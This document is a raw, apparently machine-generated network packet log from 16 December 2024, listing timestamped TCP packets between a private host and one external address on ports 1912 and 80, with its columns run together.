                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.062225103 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.062251091 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.062316895 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.062329054 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.062431097 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.062439919 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.062563896 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.062582016 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.062747955 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.062766075 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.062915087 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.062923908 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.063061953 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.063158989 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.063261032 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.063271046 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.063342094 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.063353062 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.063478947 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.063488960 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.063570023 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.063586950 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.063719988 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.063730001 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.063941956 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.063951969 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.064078093 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.064153910 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.064203024 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.064210892 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.064302921 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.064311981 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.064421892 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.064429998 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.064548969 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.064558983 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.064667940 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.064688921 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.064821005 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.064870119 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.064990044 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.065001011 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.065090895 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.065143108 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.065243006 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.068625927 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.068752050 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.068752050 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.068818092 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.188693047 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.188756943 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.188769102 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.188803911 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.188815117 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.188935995 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.188946009 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189012051 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189022064 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189133883 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189186096 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189263105 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189312935 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189341068 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189351082 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189434052 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189445019 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189465046 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189527035 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189626932 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189635992 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189704895 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189726114 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189784050 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189793110 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189861059 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189870119 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.189979076 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.190010071 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.190124989 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.190135956 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.190201044 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.190289021 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.190320015 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.190401077 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.190471888 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.190522909 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.190556049 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.190594912 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.190655947 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.190718889 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.190778017 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.190797091 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191005945 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191015005 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191118002 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191131115 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191159964 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191250086 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191261053 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191271067 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191411018 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191420078 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191471100 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191488981 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191499949 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191540956 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191636086 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191657066 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191734076 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191814899 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191843033 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191863060 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191961050 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.191991091 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192049980 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192070007 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192154884 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192164898 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192249060 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192259073 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192331076 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192379951 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192446947 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192456961 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192533970 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192610025 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192641973 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192660093 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192750931 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192760944 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192771912 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192812920 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192914963 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.192950964 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193038940 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193056107 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193109989 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193120003 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193195105 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193205118 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193310022 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193320036 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193387032 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193450928 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193566084 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193612099 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193691015 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193700075 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193792105 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193856955 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193933010 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193953037 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.193998098 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.194057941 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.194297075 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.194375992 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.194413900 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.196628094 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.196721077 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.196721077 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.196754932 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.316860914 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.316879034 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.316926956 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.316939116 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.316967964 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.317013979 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.317054033 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.317122936 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.317166090 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.317231894 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.317354918 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.317365885 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.317420006 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.317502022 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.317559004 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.317584991 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.317684889 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.317750931 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.317831039 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.317925930 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.317990065 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.318001032 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.318098068 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.318109035 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.318156958 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.318202972 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.318258047 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.318383932 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.318444014 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.318537951 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.318595886 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.318746090 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.318850040 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.318865061 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.318933010 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.318969965 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.319133997 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.319144011 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.319222927 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.319283009 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.319372892 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.319426060 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.319454908 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.319485903 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.319536924 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.319569111 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.499665022 CET8049771185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.499859095 CET8049771185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.499908924 CET4977180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.501336098 CET4977180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.606491089 CET4977780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.621098042 CET8049771185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.726178885 CET8049777185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.726259947 CET4977780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.726342916 CET4977780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.845967054 CET8049777185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.846010923 CET4977780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.919908047 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.921766043 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.965641022 CET8049777185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:11.041893959 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:11.355973959 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:11.357050896 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:11.476883888 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:11.801091909 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:11.855819941 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:11.884558916 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:12.195861101 CET8049777185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:12.196363926 CET8049777185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:12.196424007 CET4977780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:12.197539091 CET4977780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:12.309483051 CET4978380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:12.317194939 CET8049777185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:12.429363966 CET8049783185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:12.429539919 CET4978380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:12.429653883 CET4978380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:12.550839901 CET8049783185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:12.552704096 CET4978380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:12.672518969 CET8049783185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:13.902513981 CET8049783185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:13.902529001 CET8049783185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:13.902597904 CET4978380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:13.904289961 CET4978380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:14.012836933 CET4978980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:14.025624990 CET8049783185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:14.134543896 CET8049789185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:14.134629011 CET4978980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:14.134696007 CET4978980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:14.254780054 CET8049789185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:14.254856110 CET4978980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:14.374659061 CET8049789185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:15.576029062 CET8049789185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:15.576107025 CET8049789185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:15.576236010 CET4978980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:15.593674898 CET4978980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:15.704898119 CET4979080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:15.715137959 CET8049789185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:15.825932026 CET8049790185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:15.826133966 CET4979080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:15.826190948 CET4979080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:15.945892096 CET8049790185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:15.945966959 CET4979080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:16.065623999 CET8049790185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:17.452081919 CET8049790185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:17.452111006 CET8049790185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:17.452193975 CET4979080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:17.453562021 CET4979080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:17.559251070 CET4979680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:17.573354959 CET8049790185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:17.679124117 CET8049796185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:17.679233074 CET4979680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:17.679356098 CET4979680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:17.799170017 CET8049796185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:17.799346924 CET4979680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:17.919261932 CET8049796185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:19.296346903 CET8049796185.81.68.147192.168.2.10
